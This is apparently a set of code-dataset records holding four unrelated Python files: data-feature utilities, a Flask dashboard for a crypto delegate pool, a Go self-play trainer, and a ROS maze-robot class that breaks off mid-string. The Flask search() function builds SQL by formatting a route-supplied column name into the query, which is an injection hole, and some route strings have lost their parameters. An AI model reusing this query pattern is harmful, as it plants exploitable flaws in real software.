\n tsed = df.dropna(axis=0).reset_index(drop=True)[['user_id','time','fwver']]\n dfw = tsed[['user_id','fwver']]\n fw_d =dfw.loc[(dfw !=dfw.shift(1)).sum(axis=1)>0]\n\n main_fw_ar = np.zeros((num_df_user,6))\n for i,tgid in enumerate(tqdm(range(first_index,first_index+num_df_user))):\n\n tgdf =fw_d.loc[fw_d.user_id ==tgid].iloc[1:,:]\n tgidtotal = tsed.loc[tsed.user_id ==tgid]\n try:\n data =tgidtotal.loc[sorted([tgidtotal.index[0]] + [x-1 for x in tgdf.index]+[x for x in tgdf.index] + [tgidtotal.index[-1]] )]\n t1 =data.time_second\n if len(t1) %2 !=0:\n print('lenth error')\n time_delta = (t1-t1.shift(1)).dt.total_seconds()\n\n main_fwver =data.loc[time_delta.loc[time_delta==time_delta.max()].index].fwver.values[0]\n main_fw_ar[i,0] = fwver_total_dic[main_fwver]\n main_fw_ar[i,1] =(time_delta[1::2].values).max().astype('float')/(time_delta.values[1:]).sum().astype('float') #target fw workingtime / total\n if len(time_delta) ==1:\n main_fw_ar[i,2] =0 
#min of change fwver time==0\n main_fw_ar[i,3] =0 #std of change fwver time ==0\n main_fw_ar[i,4] =0 #std\n main_fw_ar[i,5] =0 #variance\n else:\n main_fw_ar[i,2] =time_delta[::2].min()/3600 # min hours\n main_fw_ar[i,3] =time_delta[::2].std()/3600\n main_fw_ar[i,4] =time_delta[1::2].values.astype('float').std()/3600 #std running time of fw\n main_fw_ar[i,5] =(time_delta[1::2].values.astype('float')/3600).var() #std running time of fw\n except:\n main_fw_ar[i,0] =0\n main_fw_ar[i,1] =0\n main_fw_ar[i,2] =0\n main_fw_ar[i,3] =0\n main_fw_ar[i,4] =0\n main_fw_ar[i,5] =0\n \n #5, 5, 6, 6\n return [fwver_np, fw_model_flow, time_term, main_fw_ar]\n\ndef check_unique(col,df1,df2):\n def change_len(x):\n if len(x) ==10:\n return x[:5]\n else:\n return x\n print(\"about\",col)\n if col !='fwvers':\n train_c = set(df1[col].unique())\n test_c = set(df2[col].unique())\n total = (train_c | test_c)\n else:\n train_c = set(df1[col].apply(change_len).unique())\n test_c = set(df2[col].apply(change_len).unique())\n total = (train_c | test_c) \n \n print()\n \n return total\n\ndef qual_change(df, user_num, user_min):\n tmp = df.groupby('user_id')[['quality_' + str(i) for i in range(13)]].nunique() - 1\n tmp2 = tmp.sum(axis=1)\n qual_dic = defaultdict(lambda: 0, zip(tmp2.index, tmp2))\n qaul_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_num)]})\n qaul_num['n_qualchange'] = qaul_num['user_id'].map(qual_dic)\n\n return qaul_num['n_qualchange'].values\n\n\ndef model_ft(df,user_num):\n # model_nm\n id_model = df[['user_id','model_nm']]\n #user_num = 14999\n #model = np.zeros((user_num,9))\n id_model_not_dup = id_model.drop_duplicates()\n id_model_count = id_model_not_dup.groupby('user_id').count()\n id_model_count_np = id_model_count.values\n\n if user_num == 15000 :\n id_model_count_np[13991 - 10000][0] = 3\n id_model_count_np[18525 - 10000][0] = 3\n id_model_count_np[20921 - 10000][0] = 3\n\n elif user_num == 14999:\n id_model_count_np=np.insert(id_model_count_np,13262,1)\n id_model_count_np[34758 - 30000] = 3\n\n return id_model_count_np\n\n\ndef qual_statics(df, user_count, user_min):\n # 4 statistics for each of the 11 quality variables: 44 features\n # count and ratio of -1 values: 2 features\n # counts for 12 and 24, plus the 24/12 ratio\n # 49 features in total\n for x in range(0,13):\n if x == 3 or x==4:\n pass\n else:\n qual_df = df.groupby('user_id')['quality_'+str(x)].agg(['mean', 'std', 'min', 'max'])\n qual_df = qual_df.reset_index()\n qaul_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_count)]})\n ql_mg = pd.merge(qaul_num,qual_df,on='user_id',how='left')\n ql_mg.drop('user_id',axis=1,inplace=True)\n ql_val = ql_mg.fillna(0).values\n if x == 0:\n qual_val_all = ql_val\n else:\n qual_val_all = np.concatenate((qual_val_all,ql_val),axis=1)\n\n qual_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_count)]})\n\n\n \n for x in range(0,13):\n if x == 3 or x==4:\n pass\n else:\n qual_i_mean = df['quality_'+str(x)].agg(['mean']) # a single scalar\n\n user_qual_i_mean = df.groupby('user_id')['quality_'+str(x)].agg(['mean'])\n user_qual_i_mean = user_qual_i_mean.reset_index()\n user_qual_i_std = df.groupby('user_id')['quality_'+str(x)].agg(['std'])\n user_qual_i_std = user_qual_i_std.reset_index()\n qual_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_count)]})\n user_qual_i_mean_df = pd.merge(qual_num,user_qual_i_mean,on='user_id',how='left')\n user_qual_i_std_df = pd.merge(qual_num,user_qual_i_std,on='user_id',how='left')\n\n qual_ff = user_qual_i_std_df['std'] 
/(user_qual_i_mean_df['mean'] - qual_i_mean['mean'])\n qual_ff = qual_ff.fillna(0)\n qual_ff = qual_ff.values\n qual_ff = qual_ff.reshape((-1,1))\n\n if x == 0:\n qual_ff_all = qual_ff\n else:\n qual_ff_all = np.concatenate((qual_ff_all,qual_ff),axis=1)\n \n \n col = 'quality_1'\n q1_minus1_cnt = df[df[col] == -1 ].groupby('user_id').count()[col] \n q1_minus1_cnt = q1_minus1_cnt.reset_index(\"user_id\")\n q1_minus1_cnt_done = pd.merge(qual_num,q1_minus1_cnt,on='user_id',how='left')\n q1_minus1_cnt_done = q1_minus1_cnt_done.fillna(0)\n # q1_minus1_cnt_np = q1_minus1_cnt_done1.drop('user_id',axis=1).values\n # print(q1_minus1_cnt_np)\n\n ## ratio of -1 values in quality_1\n qual_cnt = df.groupby('user_id').count()[col] \n qual_cnt = qual_cnt.reset_index(\"user_id\")\n qual_cnt.rename(columns = {col : col+'count'}, inplace = True)\n qual_cnt_done = pd.merge(qual_num,qual_cnt,on='user_id',how='left')\n\n q1_minus1_cnt_done[col+'_rate'] = q1_minus1_cnt_done[col] / qual_cnt_done[col+'count'] \n q1_minus1_cnt_done[col+'_rate'] = q1_minus1_cnt_done[col+'_rate'].fillna(0)\n # q1_minus1_rate_np = q1_minus1_rate.drop('user_id',axis=1)\n qual_num = q1_minus1_cnt_done\n\n # print(qual_num)\n qual_num.drop('user_id',axis=1,inplace=True)\n qual_minus_val = qual_num.values\n\n qual_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_count)]})\n #qual_num = pd.DataFrame(data={'user_id': [num for num in range(10000,25000)]})\n\n temp = df.groupby(['user_id','time']).count()\n\n quality_12= temp.reset_index()[temp.reset_index().fwver==12].user_id.value_counts()\n\n quality_12_df = quality_12.to_frame()\n quality_12_df = quality_12_df.reset_index()\n quality_12_df = quality_12_df.rename(columns = {'index' :'user_id','user_id':'counts'})\n quality_12_sum = quality_12_df.counts.sum()\n qual_12 = pd.merge(qual_num,quality_12_df,on='user_id',how='left')\n qual_12 = qual_12['counts']\n\n # count of 12 / total count\n qual_12_rate = qual_12 / quality_12_sum\n qual_12_rate= qual_12_rate.fillna(0).values.reshape(-1,1)\n\n quality_24= temp.reset_index()[temp.reset_index().fwver==24].user_id.value_counts()\n quality_24_df = quality_24.to_frame()\n quality_24_df = quality_24_df.reset_index()\n quality_24_df = quality_24_df.rename(columns = {'index' :'user_id','user_id':'counts'})\n quality_24_sum = quality_24_df.counts.sum()\n qual_24 = pd.merge(qual_num,quality_24_df,on='user_id',how='left')\n qual_24 = qual_24['counts']\n qual_24_count_np = qual_24.values\n\n # count of 24 / total count\n qual_24_rate = qual_24 / quality_24_sum\n qual_24_rate= qual_24_rate.fillna(0).values.reshape(-1,1)\n \n # 24/12 ratio\n qual_24_12_rate = qual_24 / qual_12\n qual_24_12_rate = qual_24_12_rate.fillna(0)\n qual_24_12_rate_np = qual_24_12_rate.values.reshape(-1,1)\n\n\n return np.concatenate((qual_val_all,qual_minus_val,qual_12_rate, qual_24_rate , qual_24_12_rate_np,qual_ff_all),axis=1)\n\n\n\n\ndef nun_err(df,ver):\n df_cp = df.copy()\n df_cp['errtype_errcode']= df_cp['errtype'].astype('str') + '_' + df_cp['errcode'].astype('str')\n nun_err = df_cp.groupby('user_id')['errtype','errcode','errtype_errcode'].nunique().reset_index()\n if ver =='train':\n nun_err.drop('user_id', axis=1, inplace=True)\n nun_err_val = nun_err.values\n else:\n nun_err.loc[-1] = [43262, 0, 0, 0] # adding a row\n nun_err.index = nun_err.index + 1 # shifting index\n nun_err = nun_err.sort_values(by='user_id') # sorting by index\n nun_err.drop('user_id', axis=1, inplace=True)\n nun_err_val = nun_err.values\n\n return 
nun_err_val\n\n\n\n\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":30461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"124162117","text":"# -*- encoding:utf-8 -*-\nimport os\nimport io\nimport re\nimport json\nimport flask\nimport sqlite3\nimport datetime\nimport threading\nimport logging\nimport requests\n\nfrom flask_bootstrap import Bootstrap\nfrom collections import OrderedDict \nfrom zen import tfa, crypto\nfrom zen.cmn import loadConfig, loadJson\nfrom zen.chk import getBestSeed, getNextForgeRound\nfrom zen.tbw import loadTBW, spread, loadParam\nfrom zen.app import opt\n\nROOT = os.path.abspath(os.path.dirname(__file__))\n\n# create the application instance \napp = flask.Flask(__name__) \nBootstrap(app)\napp.config.update(\n\t# 300 seconds = 5 minutes lifetime session\n\tPERMANENT_SESSION_LIFETIME = 300,\n\t# used to encrypt cookies\n\t# secret key is generated each time app is restarted\n\tSECRET_KEY = os.urandom(24),\n\t# JS can't access cookies\n\tSESSION_COOKIE_HTTPONLY = True,\n\t# bi use of https\n\tSESSION_COOKIE_SECURE = False,\n\t# update cookies on each request\n\t# cookie are outdated after PERMANENT_SESSION_LIFETIME seconds of idle\n\tSESSION_REFRESH_EACH_REQUEST = True\n)\n\n\n# load all information\nCONFIG = loadConfig()\nPARAM = loadParam()\nLOCAL_API = \"http://localhost:%(port)s/api/\" % CONFIG\n# LOCAL_API = \"http://167.114.29.52:%(port)s/api/\" % CONFIG\n\n\n# show index\n@app.route(\"/\")\ndef render():\n\tglobal CONFIG, PARAM\n\tspread()\n\n\tweight = loadTBW()\n\ttokens = sum(weight.values())\n\tc = float(sum(weight.values()))\n\titems = [[k,v/max(1.0, c)*100] for k,v in weight.items()]\n\n\treturn flask.render_template(\n\t\t\"bs-layout.html\",\n\t\tnext_block=getNextForgeRound(CONFIG[\"peer\"], **CONFIG),\n\t\titems=sorted(items, key=lambda e:e[-1], reverse=True),\n\t\ttokens=tokens,\n\t\tusername=PARAM.get(\"username\", \"_\"),\n\t\tshare=PARAM.get(\"share\", 1.),\n\t\tthreshold=PARAM.get(\"threshold\", 0.),\n\t\tsymbol=PARAM.get(\"symbol\", \"token\"),\n\t\texplorer=CONFIG[\"explorer\"]\n\t)\n\n\n@app.route(\"/history////\")\ndef render_history(field, value, start, number):\n\tglobal CONFIG, PARAM\n\tif value:\n\t\tif getattr(flask.g, \"search_field\", None) != field:\n\t\t\tflask.g.rows = search(**{field:value, \"table\":\"transactions\"})\n\t\t\tflask.g.search_field = field\n\n\t\treturn flask.render_template(\n\t\t\t\"bs-history.html\",\n\t\t\tfield=field,\n\t\t\tvalue=value,\n\t\t\tstart=start,\n\t\t\tnumber=number,\n\t\t\texplorer=CONFIG[\"explorer\"],\n\t\t\tsymbol=PARAM.get(\"symbol\", \"token\"),\n\t\t)\n\n\n@app.route(\"/stats\")\ndef get_stats():\n\treturn flask.render_template(\n\t\t\"bs-stats.html\",\n\t\tusername=PARAM.get(\"username\", \"_\"),\n\t\tpayments=getFilesFromDirectory(\"archive\", \".tbw\", 'json')\n\t)\n\n\n@app.route(\"/logs\")\ndef get_logs():\n\t# check if logged in from cookies\n\tif not flask.session.get(\"logged\", False):\n\t\t# if not logged in return to login page\n\t\treturn flask.redirect(flask.url_for(\"login\"))\n\telse:\n\t\t# render manage page\n\t\treturn flask.render_template(\n\t\t\t\"bs-logs.html\",\n\t\t\tusername=PARAM.get(\"username\", \"_\"),\n\t\t\tpayments=getFilesFromDirectory(\"..\", \".log\")\n )\n\n\n@app.route(\"/optimize/////\")\ndef optimize(blockchain, vote, usernames, offsets, delta):\n\tdelta = max(delta, 10)\n\tpool = loadJson(os.path.join(ROOT, \"pool.%s.json\" % blockchain))\n\tif not 
len(pool):\n\t\treturn \"No public pool defined on %s blockchain !\" % blockchain\n\t# configure delegate behaviour according to blockchain parameters\n\topt.Delegate.configure(\n\t\tblocktime=CONFIG[\"blocktime\"],\n\t\tdelegates=CONFIG[\"delegates\"],\n\t\treward=float(requests.get(LOCAL_API+\"blocks/getReward\").json().get(\"reward\", 0))/100000000\n\t)\n\t# separate usernames\n\tdelegates = [\n\t\td for d in requests.get(LOCAL_API+\"delegates\").json().get(\"delegates\", []) \\\n\t\tif d[\"username\"] in (pool.keys() if usernames == \"all\" else usernames.split(\",\"))\n\t]\n\t# create delegate object for the solver\n\tdelegates = [\n\t\topt.Delegate(d[\"username\"], pool[d[\"username\"]][\"share\"], float(d[\"vote\"])/100000000, float(pool[d[\"username\"]][\"exclude\"])/100000000) \\\n\t\tfor d in delegates if d[\"username\"] in pool\n\t]\n\t# remove curent vote given in username order in offsets\n\tif usernames != \"all\":\n\t\ti = 0\n\t\tfor offset in [int(s) for s in offsets.split(\",\")]:\n\t\t\tdelegates[i].vote -= offset\n\t\t\ti += 1\n\t# resolve best vote spread\n\tif len(delegates):\n\t\treturn json.dumps(OrderedDict(sorted(\n\t\t\t[(k,v) for k,v in opt.solve(vote, delegates, step=delta).items() if v > 0],\n\t\t\tkey=lambda e:e[-1],\n\t\t\treverse=True\n\t\t)), indent=2)\n\telse:\n\t\treturn \"No public pool available !\"\n\n\n@app.route(\"/dashboard/share//\")\ndef compute_share(address, period):\n\tusername = PARAM[\"username\"]\n\n\texcludes = 0\n\tfor addr in PARAM[\"excludes\"]:\n\t\texcludes += float(requests.get(LOCAL_API+\"accounts/getBalance?address=\"+addr).json().get(\"balance\", 0))/100000000\n\n\treward = float(requests.get(LOCAL_API+\"blocks/getReward\").json().get(\"reward\", 0))/100000000\n\tbalance = float(requests.get(LOCAL_API+\"accounts/getBalance?address=\"+address).json().get(\"balance\", 0))/100000000\n\tvote = float(requests.get(LOCAL_API+\"delegates/get?username=\"+username).json().get(\"delegate\", {}).get(\"vote\", 0))/100000000\n\n\tforged = (period * 3600 * 24) / (CONFIG['blocktime'] * CONFIG['delegates']) * reward\n\tweight = balance/max(1, vote+balance-excludes) # avoid ZeroDivisioError :)\n\n\treturn flask.render_template(\n\t\t\"bs-dashboard.html\",\n\t\tusername=username,\n\t\tinfo={\n\t\t\t\"walletAddress\": address,\n\t\t\t\"walletAmount\": balance,\n\t\t\t\"walletAddressRatio\": weight,\n\t\t\t\"reward\": forged * weight * PARAM[\"share\"],\n\t\t\t\"period\": period,\n\t\t\t\"vote\" : vote\n\t\t}\n\t)\n\n\n@app.teardown_appcontext\ndef close(*args, **kw):\n\tif hasattr(flask.g, \"database\"):\n\t\tflask.g.database.close()\n\n\n@app.context_processor\ndef override_url_for():\n\treturn dict(url_for=dated_url_for)\n\n\n## Identification\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n\tglobal CONFIG, PARAM\n\t# enable session lifetime to 10 min\n\tflask.session[\"permanent\"] = True\n\t# if POST method send from login page or any POST containing a signature field\n\tif flask.request.method == \"POST\":\n\t\tflask.session.pop(\"logged\", None)\n\t\t# check signature match (signature must be sent as hexadecimal string)\n\t\ttry: check = tfa.check(CONFIG[\"publicKey\"], crypto.unhexlify(flask.request.form[\"signature\"]))\n\t\texcept: check = False\n\t\tif check:\n\t\t\t# store the logged state\n\t\t\tflask.session[\"logged\"] = True\n\t\t\t# go to manage page\n\t\t\treturn flask.redirect(flask.url_for(\"manage\"))\n\t\telse:\n\t\t\t# store the logged state\n\t\t\tflask.session[\"logged\"] = False\n\t\t\t# return to 
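index\n\t\t\t# Note: a failed or missing signature check therefore falls through to the\n\t\t\t# public index page rather than re-rendering the login form with an error.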
\n\t\t\treturn flask.redirect(flask.url_for(\"render\"))\n\t# on a plain GET, render the login page\n\telse:\n\t\treturn flask.render_template(\"bs-login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n\t# store the logged state\n\tflask.session[\"logged\"] = False\n\t# return to index\n\treturn flask.redirect(flask.url_for(\"render\"))\n\n\n@app.route(\"/manage\")\ndef manage():\n\t# check if logged in from cookies\n\tif not flask.session.get(\"logged\", False):\n\t\t# if not logged in, return to login page\n\t\treturn flask.redirect(flask.url_for(\"login\"))\n\telse:\n\t\t# render manage page\n\t\treturn flask.render_template(\"manage.html\")\n\n\ndef dated_url_for(endpoint, **values):\n\tif endpoint == 'static':\n\t\tfilename = values.get('filename', None)\n\t\tif filename:\n\t\t\tfile_path = os.path.join(app.root_path,\n\t\t\t\t\t\t\t\t\t endpoint, filename)\n\t\t\tvalues['q'] = int(os.stat(file_path).st_mtime)\n\treturn flask.url_for(endpoint, **values)\n\n\ndef format_datetime(value, size='medium'):\n\tif size == 'full':\n\t\tfmt = \"%A, %-d. %B %Y at %H:%M\"\n\telif size == 'minimal':\n\t\tfmt = \"%a, %d.%m.%y\"\n\telse:\n\t\t# default to the medium format for 'medium' and any unknown size\n\t\tfmt = \"%a, %d.%m.%y %H:%M\"\n\t# the [:-6] strips the +XX:YY offset at the end of the timestamp\n\ttuple_date = datetime.datetime.strptime(value[:-6], \"%Y-%m-%d %H:%M:%S.%f\")\n\treturn datetime.datetime.strftime(tuple_date, fmt)\napp.jinja_env.filters['datetime'] = format_datetime\n\n\ndef replace_regex(value, pattern, repl):\n\tresult = re.sub(pattern, repl, value)\n\tapp.logger.info(\"value: %s, pattern: %s, repl: %s\" % (value, pattern, repl))\n\tapp.logger.info(\"result: %s\" % result)\n\treturn result\napp.jinja_env.filters['replace_regex'] = replace_regex\n\n\ndef connect():\n\tif not hasattr(flask.g, \"database\"):\n\t\tsetattr(flask.g, \"database\", sqlite3.connect(os.path.join(app.root_path, \"..\", \"pay.db\")))\n\t\tflask.g.database.row_factory = sqlite3.Row\n\treturn flask.g.database.cursor()\n\n\ndef search(table=\"transactions\", **kw):\n\tcursor = connect()\n\tcursor.execute(\n\t\t\"SELECT * FROM %s WHERE %s=? 
ORDER BY timestamp DESC;\"%(table, kw.keys()[0]),\n\t\t(kw.values()[0], )\n\t)\n\tresult = cursor.fetchall()\n\treturn [dict(zip(row.keys(), row)) for row in result]\n\n\ndef getFilesFromDirectory(dirname, ext, method=None):\n\tfiles_data = {}\n\tbase = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n\tfor root, dirs, files in os.walk(os.path.join(base, dirname)):\n\t\tfor filename in files:\n\t\t\tif filename.endswith(ext):\n\t\t\t\tif method == 'json':\n\t\t\t\t\tfiles_data[filename.replace(ext, \"\")] = loadJson(os.path.join(root, filename))\n\t\t\t\telse: \n\t\t\t\t\twith io.open(os.path.join(root, filename), 'r') as in_:\n\t\t\t\t\t\tfiles_data[filename.replace(ext, \"\")] = in_.read()\n\treturn files_data\n","sub_path":"zen/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"364904683","text":"from battle import BattleGround\nfrom game import Game\nfrom model import Model\nfrom mcts import MCTS\nimport numpy as np\nimport os\nimport sys\nfrom pickle import Pickler, Unpickler\nfrom random import shuffle\nfrom utils import *\nimport pandas as pd\nimport datetime\n\n\nclass Trainer():\n def __init__(self, game, nnet, args):\n self.game = game\n self.nnet = nnet\n self.pnet = self.nnet.__class__(self.game) # the competitor network\n self.args = args\n self.mcts = MCTS(self.game, self.nnet, self.args)\n\n self.trainExamplesHistory = []\n self.loss_list = []\n self.win_rate_list = []\n self.self_play_count = 0\n\n def self_play(self, training=False):\n \"\"\"\n go through one run of self play and return training examples for nnet\n Returns: training examples of (standard_board, policy, win rate) \n \"\"\"\n # to avoid kos\n latest_two_s_a = []\n pass_count = 0\n\n training_examples = []\n episodeStep = 0\n board = self.game.get_init_board()\n\n while True:\n # check if game end\n r = self.game.check_is_end(board, 1)\n if r != 0 or pass_count >= 2 or episodeStep > self.game.get_action_size()*2:\n return training_examples\n\n episodeStep += 1\n\n # run mcts to get the training example from this root node\n policy, v = self.mcts.calculate_p_v(board, temp=1)\n\n # get all symmetry board for robustness\n symmetrics = self.game.get_all_perspectives(board, policy)\n for b, p in symmetrics:\n training_examples.append([b, p, v])\n\n # stop if exceed max step\n if episodeStep > self.game.get_action_size()*2:\n return training_examples\n\n # filter out ko actions\n s = self.game.to_string(board)\n valid_vector = self.game.get_valid_moves(board, 1)\n for a_position, _ in np.ndenumerate(valid_vector):\n if (s, a_position[0]) in latest_two_s_a:\n valid_vector[a_position] = 0\n\n # re_normalize\n policy *= valid_vector\n p_sum = np.sum(policy)\n if p_sum > 0:\n policy /= p_sum\n\n # must be movable\n if np.array(policy).sum() == 0:\n pass_count += 1\n board, curr_player = self.game.get_next_state(\n board, 1, -1)\n continue\n else:\n # to encourage the model to explore\n if training == True:\n policy = np.array(policy) + 0.5/self.game.get_action_size()\n p_sum = np.sum(policy)\n policy /= p_sum\n action = np.random.choice(len(policy), p=policy)\n\n # record recent s to a\n latest_two_s_a.append((s, action))\n if len(latest_two_s_a) > 2:\n latest_two_s_a.pop(0)\n\n board, curr_player = self.game.get_next_state(\n board, 1, action)\n board = self.game.get_standard_board(\n board, curr_player)\n\n pass_count = 0\n\n def learn(self):\n self.loss_list = []\n 
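# Each iteration below: run self_play_num games of self-play (the first 7 per\n        # iteration only warm up and are discarded), train the net on the pooled\n        # examples, then benchmark against a random player via test_MCTS_with_NNet.\n        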
self.win_rate_list = []\n for i in range(1, self.args.iter_num+1):\n print(str(i) + 'th iteration at {} ->'.format(datetime.datetime.now().time()))\n iterationTrainExamples = []\n self.self_play_count = 0\n for j in range(self.args.self_play_num):\n print(\"self-play: {}\".format(j))\n self.self_play_count += 1\n self.mcts = MCTS(self.game, self.nnet, self.args)\n if self.self_play_count > 7:\n iterationTrainExamples += self.self_play()\n else:\n self.self_play()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n # shuffle examples before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n loss = self.nnet.train(trainExamples)\n self.loss_list.append(loss)\n\n result = test_MCTS_with_NNet(self.game, self.nnet,\n self.game.get_board_size()[0])\n self.win_rate_list.append(result)\n\n self.trainExamplesHistory = []\n print(\"current loss = {}\".format(loss))\n self.nnet.save_checkpoint(\n folder=self.args.checkpoint, filename='model_{}x{}.pth.tar'.format(*self.game.get_board_size()))\n\n df_loss = pd.DataFrame({'loss': self.loss_list})\n df_loss.to_csv('./plots/loss_{}x{}.csv'.format(\n *self.game.get_board_size()), sep=',')\n df_win_rate = pd.DataFrame({'win_rate': self.win_rate_list})\n df_win_rate.to_csv('./plots/win_rate_{}x{}.csv'.format(\n *self.game.get_board_size()), sep=',')\n\n\ndef test_MCTS_with_NNet(game, nnet, n):\n '''\n Returns:\n win rate for ai\n '''\n print(\"Test MCTS with CNN on {}X{} with {} search on each step:\".format(n, n, n*n))\n random_player = RandomPlayer(game)\n model = nnet\n local_args = dotdict({'tree_search_count': n*n, 'cpuct': 1.0})\n mcts = MCTS(game, model, local_args)\n def nnet_player(board): return mcts.calculate_p_v(board)\n bg = BattleGround(nnet_player, random_player.play, game)\n ai_win, random_win, draw = bg.playGames(5)\n return ai_win/(ai_win + random_win + draw)\n\n\nclass RandomPlayer():\n def __init__(self, game: \"Game\"):\n self.game = game\n\n def play(self, board):\n p = np.random.random_sample(self.game.get_action_size())\n valids = self.game.get_valid_moves(board, 1)\n p *= valids\n return p, 0.5\n\n\n# adjust params here\nargs = dotdict({\n 'iter_num': 100,\n 'self_play_num': 32,\n 'tree_search_count': 32,\n 'cpuct': 1,\n 'checkpoint': './train'\n})\n\n\nif __name__ == \"__main__\":\n print(\"-- Going to retrain all models\")\n print(\"-- Adjust params of trainer in train.py\")\n print(\"-- Default: will go through 100 iteration for each model\")\n print(\"-- Note: trained model will be saved to ./train\")\n print(\"-- Warning: it will be very slow to train to accelerate decrease self_play_num, tree_search_count, or iter_num\")\n\n print(\"-- train 4X4\")\n game = Game(4)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n\n print(\"-- train 5X5\")\n game = Game(5)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n\n print(\"-- train 6X6\")\n game = Game(6)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n\n print(\"-- train 7X7\")\n game = Game(7)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n\n print(\"-- train 8X8\")\n game = Game(8)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"65257559","text":"#!/usr/bin/env 
python\n\nimport rospy\nfrom geometry_msgs.msg import *\nfrom move_base_msgs.msg import MoveBaseActionGoal\nfrom tf import TransformListener\nfrom tf.transformations import quaternion_from_euler\nimport math\nfrom std_srvs.srv import Empty\nfrom maze_game.srv import *\nimport numpy as np\nimport tf\nimport sys\n\n# Enum indicating the robot's current state, to help facilitate transitions from\n# one operation to the next (relates to Robot):\nclass RobotState:\n    # IDLE            - the robot is not doing anything and is ready to be re-tasked\n    # MOVING_TO_START - the robot is moving to the start of the maze\n    # RUNNING_MAZE    - the robot is running the maze and should not be interrupted\n    # FINISHED_MAZE   - the robot has finished the maze; used primarily for score\n    #                   logging and a future re-queue mechanism\n    IDLE, MOVING_TO_START, RUNNING_MAZE, FINISHED_MAZE = range(4)\n\n# Author: Matthew Atkins\n#\n# This class is used to represent an individual robot in the current game.\n# The object interacts with ROS directly to update itself and should inform the\n# MazeGame object associated with this game about relevant events such as taking\n# \"damage\". It does provide topics for sending information, probably to rosbridge,\n# about itself for things like updating the webUI.\n#\n# The class is designed to support multiple robots using multiple Robot object\n# instances. This class IS NOT designed to operate as an independent ROS node; a\n# robot should be created with a service call to a running maze_game node using\n# the addRobot service. This service call requires a string robot_name that will\n# be used to uniquely identify a given robot. Each robot will be given its own\n# ROS namespace to operate in, to avoid accidentally updating information\n# incorrectly. The namespace is determined by the value of robot_name from the\n# service call.\n#\n# For example, to use two robots at the same time, robot1 and robot2\n# respectively, the following namespaces will be created:\n#\n# robot1 -> robot1/move_base/goal\n# robot2 -> robot2/move_base/goal
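\n#\n# A hypothetical command-line example of the add_robot registration described\n# above (the request field name is assumed, not read from maze_game.srv):\n#\n#     rosservice call /maze_game/add_robot \"robot_name: 'robot1'\"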
\n#\n# If only one robot is to be used, a service call to \"/maze_game/add_robot\" with\n# robot_name set to \"\" will result in no namespace being prepended.\n\nclass Robot:\n    def __init__(self, robotName, modelPtr):\n        # Perform additional setup\n        self.name = robotName\n        self.model = modelPtr  # The GameModel this Robot instance belongs to\n        self.pointDex = 0\n        self.started = False\n        self.curState = RobotState.MOVING_TO_START  # The robot's current state\n        # Distance from centerline (walls) variables\n        self.distance = 0  # The robot's distance from the center of the maze's path\n        self.oldDistance = 0  # The previously observed distance from the center of the maze's path\n        # Used to determine how 'good' a run through the maze was and approximately\n        # how long a robot was in contact with an obstacle.\n        self.health = 100000\n        # The current goal used to decide which path segment the distance calculation\n        # should be performed with respect to. Also used to compute the disparity\n        # between the robot's own notion of what is a 'good' goal and what the user\n        # actually gives it.\n        self.curGoal = self.model.getExpPointAt(0)\n        self.arivedAtLastGoal = None\n        rospy.loginfo(\"subscribing to /%s/move_base/current_goal\\n\", self.name)\n        # The original line here was flagged MYSTERIOUS; rospy's subscription API is\n        # rospy.Subscriber, and the goal topic carries geometry_msgs/PoseStamped.\n        self.sub = rospy.Subscriber(\"/\" + self.name + \"/move_base/current_goal\", PoseStamped, self.newGoalCallback, self.pointDex)\n        # Advertise the per-robot score-submission service; the SubmitScores type is\n        # assumed to come from the maze_game.srv wildcard import above.\n        self.addRobotService = rospy.Service(\"/maze_game/submit_scores_\" + self.name, SubmitScores, self.submitScores)\n\n        # Score recording and submission\n        self.givenPoints = []  # Keeps track of the points that are given by the user\n        self.expectedPoints = []  # Keeps track of the points that are expected by the robot\n        self.goalArivalTimestamps = []  # When the Robot arrived at each goal/point in the maze. The first entry should be the time the maze was started, the last the completion time.\n        self.healthAtGoal = []  # The robot's health as it arrives at every goal.\n        self.inputDelay = []  # Time in seconds between the robot arriving at a goal and the user sending the next navigation goal.\n        self.trustScores = []  # The UN-normalized trust scores for each input\n\n        # Check for parameters. goal_tolerance is the value checkDistance uses to see\n        # if the robot is within the target \"zone\" around its current goal (stored in\n        # curGoal); note this is the RADIUS, not the diameter, of the target zone.\n        self.goal_tolerance = 0.2\n        if rospy.has_param(robotName + \"/goal_tolerance\"):\n            rospy.loginfo(\"%s had parameter 'goal_tolerance' in public node handle\", self.name)\n            self.goal_tolerance = rospy.get_param(self.name + \"/goal_tolerance\", self.goal_tolerance)\n        elif rospy.has_param(\"goal_tolerance\"):\n            rospy.loginfo(\"%s had parameter 'goal_tolerance' in private handle\", self.name)\n            self.goal_tolerance = rospy.get_param(\"goal_tolerance\", self.goal_tolerance)\n        else:\n            rospy.loginfo(\"%s did not have a parameter named goal_tolerance! 
